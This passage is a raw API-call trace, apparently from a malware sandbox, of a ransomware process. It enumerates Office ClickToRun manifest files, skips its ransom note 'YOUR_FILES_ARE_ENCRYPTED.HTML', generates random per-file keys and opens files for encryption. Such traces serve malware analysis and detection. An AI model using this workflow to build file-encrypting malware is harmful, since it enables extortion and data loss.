(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0105.560] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=95944) returned 1 [0105.560] GetProcessHeap () returned 0x600000 [0105.560] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0105.563] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="CA") returned 2 [0105.563] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="57") returned 2 [0105.564] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="FC") returned 2 [0105.564] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="1D") returned 2 [0105.564] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="02") returned 2 [0105.564] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="A8") returned 2 [0105.564] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="91") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="43") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="5E") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="52") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="E4") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="B3") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="59") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="36") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="1A") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="0D") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="9E") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="02") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="A7") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="77") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="B7") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="D8") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="82") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="8F") returned 2 [0105.564] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="53") returned 2 [0105.565] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="EE") returned 2 [0105.565] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="9E") returned 2 [0105.565] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="64") returned 2 [0105.565] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="72") returned 2 [0105.565] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="15") returned 2 [0105.565] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="59") returned 2 [0105.565] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="47") returned 2 [0105.566] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" [0105.566] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.566] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0105.566] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d5e483, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d5e483, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x6577f134, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x4a1a, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.onenotemui.msi.16.en-us.xml", cAlternateFileName="C24C3D~1.XML")) returned 1 [0105.566] StrStrIW (lpFirst="C2RManifest.onenotemui.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.566] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml") returned 118 [0105.566] PathFindExtensionW (pszPath="C2RManifest.onenotemui.msi.16.en-us.xml") returned=".xml" [0105.566] lstrlenW (lpString=".xml") returned 4 [0105.566] PathFindExtensionW (pszPath="C2RManifest.onenotemui.msi.16.en-us.xml") returned=".xml" [0105.566] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.566] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0105.567] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=18970) returned 1 [0105.567] GetProcessHeap () returned 0x600000 [0105.567] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3164a58 [0105.570] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="A8") returned 2 [0105.570] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="39") returned 2 [0105.570] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="5F") returned 2 [0105.570] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="BA") returned 2 [0105.570] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="27") returned 2 [0105.570] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="36") returned 2 [0105.570] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="11") returned 2 [0105.570] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="B3") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="DB") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="B7") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="29") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="5A") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="EE") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="8B") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="42") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="2C") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="AE") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="60") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="0B") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="E9") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="85") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="12") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="48") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="4C") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="65") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="E0") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="89") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="B7") returned 2 [0105.571] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="9C") returned 2 [0105.572] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="19") returned 2 [0105.572] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="03") returned 2 [0105.572] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="3C") returned 2 [0105.572] lstrcpyW (in: lpString1=0x3174b0c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" [0105.572] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x274, CompletionKey=0x3164a58, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.573] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3164a58, lpOverlapped=0x3164a58) returned 1 [0105.573] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d56dc4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d56dc4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x645f4b7c, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", cAlternateFileName="C24EFF~1.XML")) returned 1 [0105.573] StrStrIW (lpFirst="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.573] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml") returned 123 [0105.573] PathFindExtensionW (pszPath="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml") returned=".xml" [0105.573] lstrlenW (lpString=".xml") returned 4 [0105.573] PathFindExtensionW (pszPath="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml") returned=".xml" [0105.573] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.573] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0105.574] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=1518) returned 1 [0105.574] GetProcessHeap () returned 0x600000 [0105.574] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0105.577] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="DE") returned 2 [0105.578] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="14") returned 2 [0105.578] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="A6") returned 2 [0105.578] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="F5") returned 2 [0105.578] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="12") returned 2 [0105.578] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="E6") returned 2 [0105.578] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="B7") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="D0") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="66") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="1C") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="20") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="4B") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="0F") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="85") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="AC") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="BB") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="4C") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="15") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="37") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="6E") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="9B") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="A6") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="08") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="B1") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="8D") returned 2 [0105.578] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="47") returned 2 [0105.579] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="0D") returned 2 [0105.579] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="87") returned 2 [0105.579] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="72") returned 2 [0105.579] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="AE") returned 2 [0105.579] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="60") returned 2 [0105.579] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="2D") returned 2 [0105.580] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" [0105.580] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.580] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0105.580] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d54840, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d54840, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x656d7217, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x2b14, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.osmmui.msi.16.en-us.xml", cAlternateFileName="C25F09~1.XML")) returned 1 [0105.580] StrStrIW (lpFirst="C2RManifest.osmmui.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.580] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml") returned 114 [0105.580] PathFindExtensionW (pszPath="C2RManifest.osmmui.msi.16.en-us.xml") returned=".xml" [0105.580] lstrlenW (lpString=".xml") returned 4 [0105.580] PathFindExtensionW (pszPath="C2RManifest.osmmui.msi.16.en-us.xml") returned=".xml" [0105.580] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.580] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0105.581] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=11028) returned 1 [0105.581] GetProcessHeap () returned 0x600000 [0105.581] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0105.679] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="E3") returned 2 [0105.679] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="05") returned 2 [0105.679] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="00") returned 2 [0105.679] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="57") returned 2 [0105.679] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="90") returned 2 [0105.679] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="B2") returned 2 [0105.679] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="BE") returned 2 [0105.679] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="59") returned 2 [0105.680] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="E8") returned 2 [0105.680] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="1A") returned 2 [0105.680] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="81") returned 2 [0105.680] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="83") returned 2 [0105.680] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="AC") returned 2 [0105.680] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="E8") returned 2 [0105.680] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="E6") returned 2 [0105.680] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="7B") returned 2 [0105.680] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="A5") returned 2 [0105.680] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="25") returned 2 [0105.680] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="3A") returned 2 [0105.680] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="F8") returned 2 [0105.681] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="A8") returned 2 [0105.681] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="02") returned 2 [0105.681] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="07") returned 2 [0105.681] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="C4") returned 2 [0105.681] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="7F") returned 2 [0105.681] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="3F") returned 2 [0105.681] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="01") returned 2 [0105.681] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="43") returned 2 [0105.681] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="24") returned 2 [0105.681] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="ED") returned 2 [0105.681] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="B0") returned 2 [0105.681] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="26") returned 2 [0105.682] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" [0105.682] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.682] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0105.694] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d4f8c1, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d4f8c1, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x645ce8f3, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x8fa, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", cAlternateFileName="C22C6F~1.XML")) returned 1 [0105.694] StrStrIW (lpFirst="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.694] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml") returned 127 [0105.694] PathFindExtensionW (pszPath="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml") returned=".xml" [0105.694] lstrlenW (lpString=".xml") returned 4 [0105.694] PathFindExtensionW (pszPath="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml") returned=".xml" [0105.694] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.694] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0105.695] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=2298) returned 1 [0105.695] GetProcessHeap () returned 0x600000 [0105.695] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0105.698] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="3A") returned 2 [0105.698] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="A7") returned 2 [0105.698] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="C3") returned 2 [0105.698] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="F0") returned 2 [0105.698] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="6C") returned 2 [0105.698] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="70") returned 2 [0105.698] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="2F") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="5C") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="1E") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="BE") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="88") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="CC") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="BB") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="16") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="A8") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="A3") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="A4") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="DC") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="59") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="79") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="CF") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="70") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="79") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="8F") returned 2 [0105.698] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="CA") returned 2 [0105.699] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="87") returned 2 [0105.699] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="BA") returned 2 [0105.699] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="63") 